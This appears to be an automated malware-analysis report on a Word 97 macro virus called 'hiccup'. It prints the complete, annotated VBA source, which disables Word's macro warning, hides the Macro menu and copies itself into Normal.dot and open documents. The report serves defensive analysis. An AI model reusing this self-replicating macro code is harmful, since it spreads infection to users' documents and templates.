Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d8d36740569da588…

MALICIOUS

Office (OLE)

45.0 KB Created: 2002-02-27 11:15:00 Authoring application: Microsoft Word 8.0 (i.e. Word 97, matching the "Word 97/2k" tag in the macro source) First seen: 2012-06-14
MD5: 3a1c83fcdb1a3ab3d7cba1aecfb10aaa SHA-1: 517b8d78ec4472b9541ab49e26956e24a7f68acb SHA-256: d8d36740569da5881566c6000f74d923185f29467ac22d4cfeeb821ca71e1cd5
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Word 97-era document carrying a plaintext VBA macro in its Document_Open handler, so it runs as soon as the document is opened with macros enabled. It is a self-replicating macro virus rather than a downloader. The handler first sets Options.VirusProtection = 0 (Word's macro warning dialog), silences the "save changes to Normal template?" and conversion prompts, and greys out the Tools > Macro menu entry; it then copies its own module source into the first VBA component of the Normal template (NormalTemplate.VBProject) or of the active document, renames that component "hiccup", and re-saves the document in place in .doc format. Infecting Normal.dot is how it persists across Word sessions (comparable to ATT&CK T1137.001, Office Template Macros), from where it presumably infects and saves documents opened later. The "hiccup_payload" routine is only called with a 1-in-8 chance once both the template and the document are already infected, and it merely recolours the page background red and randomly minimises/maximises the window in an endless loop — the extracted code contains no download, file-drop or shell-execution logic, so the "secondary payload" reading is not supported by the macro text. Note that on modern Office builds the VBProject object model is inaccessible unless "Trust access to the VBA project object model" is enabled, and because the macro runs under On Error Resume Next the replication step then fails silently.

Heuristics 3

  • ClamAV: Doc.Trojan.Onex-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Onex-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5571 bytes
SHA-256: 60af8fefdb9b7fc594a002e8e97ba2d8eed5e4b615dc6ef571d8923f0d3dfb6c
Detection
ClamAV: Doc.Trojan.Onex-2
Obfuscation or payload: unlikely (the source is plaintext; the only "payload" routine is a visual nuisance loop, not a dropper)
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "hiccup"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Document_Open fires automatically when the document is opened with macros enabled.
' This handler is the whole virus: it disables Word's macro warning and prompts, then
' copies this module's own source into the Normal template or the active document so
' the infection persists and spreads; the visual "hiccup" payload is only triggered
' once both of them are already infected.
Private Sub Document_Open()
 ' Every error below is swallowed, so a failing step (e.g. VBProject access denied)
 ' is skipped silently and execution simply continues with the next statement.
 On Error Resume Next
 ' DataObject is used purely as a text buffer for the SetText/GetText calls below.
 Set Code = New DataObject
 Options.ConfirmConversions = 0 ' no conversion prompt on open/save
 Options.SaveNormalPrompt = 0 ' changes to Normal.dot are saved without asking
 Options.VirusProtection = 0 ' turns off Word's macro (virus) warning dialog
' Greys out Tools > Macro so the user cannot reach the macro editor from the menu.
CommandBars("Tools").Controls("Macro").Enabled = 0
  ' Is the Normal template already infected (its first VBA component renamed "hiccup")?
  ' If not, make that component the replication target.
  If NormalTemplate.VBProject.VBComponents(1).Name = "hiccup" Then
    callitn = True
   Else
    Set A = NormalTemplate.VBProject.VBComponents(1)
  End If
  ' Same check for the active document; an uninfected document becomes the target and
  ' is flagged to be re-saved afterwards. A is overwritten here, so when both are clean
  ' only the document is written on this run; the Normal template presumably gets
  ' infected on a later open from an already-infected document.
  If ActiveDocument.VBProject.VBComponents(1).Name = "hiccup" Then
    callita = True
   Else
    Set A = ActiveDocument.VBProject.VBComponents(1)
    saveit = True
  End If
  ' Replication: wipe the target module and replace it with this module's full source
  ' ("hiccup" appears to be this document's own module; see VB_PredeclaredId = True in
  ' the module header), then rename the target to "hiccup" so the checks above
  ' recognise it next time.
  ' NOTE(review): on current Office builds VBProject is unreachable unless "Trust access
  ' to the VBA project object model" is enabled; under Resume Next the whole copy then
  ' silently no-ops — confirm in the sandbox build used for dynamic analysis.
  Set ab = A.CodeModule
   Code.SetText hiccup.VBProject.VBComponents(1).CodeModule.Lines(1, hiccup.VBProject.VBComponents(1).CodeModule.CountOfLines)
   ab.DeleteLines 1, ab.CountOfLines
   ab.InsertLines 1, Code.GetText
   A.Name = "hiccup"
   ' Payload only when template AND document were both already infected, on a 1-in-8
   ' roll (Int(Rnd * 8) yields 0..7; no Randomize call precedes this Rnd, so the
   ' sequence is whatever VBA's default seed produces).
   If callitn = True And callita = True Then
    If Int(Rnd * 8) = 2 Then
      Call hiccup_payload
    End If
   
   End If
  ' Persist the freshly infected document in place, in Word 97 binary .doc format.
  If saveit = True Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
End Sub
' "Hiccup" payload: switch to page view, turn the page background red, then busy-loop
' for the rest of the Word session, minimising and immediately maximising the window
' on a roughly 1-in-10000 roll per iteration. Nothing is written to disk and nothing is
' downloaded or executed; there is no exit condition, the loop ends only when Word
' closes (or the user stops the macro).
Private Sub hiccup_payload()
    On Error Resume Next ' object-model errors are ignored and the loop keeps spinning
    ActiveWindow.View.Type = wdPageView
    With ActiveDocument.Background.Fill.BackColor
        .RGB = RGB(255, 0, 0)
    End With
    Dim roll As Long
    Do While True
        DoEvents ' yield so Word stays responsive while we spin
        Randomize
        roll = Int(Rnd * 10000)
        If roll = 2 Then
            With Word.ActiveDocument.ActiveWindow
                .WindowState = wdWindowStateMinimize
                .WindowState = wdWindowStateMaximize
            End With
        End If
    Loop
End Sub
' Word 97/2k - Hiccup - PHSYCO XXX

' Processing file: /opt/analyzer/scan_staging/8c641389f8e64840ad4056b1b90bb559.bin
' ===============================================================================
' Module streams:
' Macros/VBA/hiccup - 7699 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Private Sub Document_Open())
' Line #2:
' 	OnError (Resume Next) 
' Line #3:
' 	SetStmt 
' 	New id_945B
' 	Set Code 
' Line #4:
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt ConfirmConversions 
' Line #5:
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #6:
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #7:
' 	LitDI2 0x0000 
' 	LitStr 0x0005 "Macro"
' 	LitStr 0x0005 "Tools"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	MemSt Enabled 
' Line #8:
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd New 
' 	LitStr 0x0006 "hiccup"
' 	Eq 
' 	IfBlock 
' Line #9:
' 	LitVarSpecial (True)
' 	St callitn 
' Line #10:
' 	ElseBlock 
' Line #11:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	Set A 
' Line #12:
' 	EndIfBlock 
' Line #13:
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd New 
' 	LitStr 0x0006 "hiccup"
' 	Eq 
' 	IfBlock 
' Line #14:
' 	LitVarSpecial (True)
' 	St callita 
' Line #15:
' 	ElseBlock 
' Line #16:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	Set A 
' Line #17:
' 	LitVarSpecial (True)
' 	St saveit 
' Line #18:
' 	EndIfBlock 
' Line #19:
' 	SetStmt 
' 	Ld A 
' 	MemLd CodeModule 
' 	Set ab 
' Line #20:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld hiccup 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	LitDI2 0x0001 
' 	Ld hiccup 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	Ld Code 
' 	ArgsMemCall SetText 0x0001 
' Line #21:
' 	LitDI2 0x0001 
' 	Ld ab 
' 	MemLd CountOfLines 
' 	Ld ab 
' 	ArgsMemCall DeleteLines 0x0002 
' Line #22:
' 	LitDI2 0x0001 
' 	Ld Code 
' 	MemLd GetText 
' 	Ld ab 
' 	ArgsMemCall InsertLines 0x0002 
' Line #23:
' 	LitStr 0x0006 "hiccup"
' 	Ld A 
' 	MemSt New 
' Line #24:
' 	Ld callitn 
' 	LitVarSpecial (True)
' 	Eq 
' 	Ld callita 
' 	LitVarSpecial (True)
' 
... (truncated)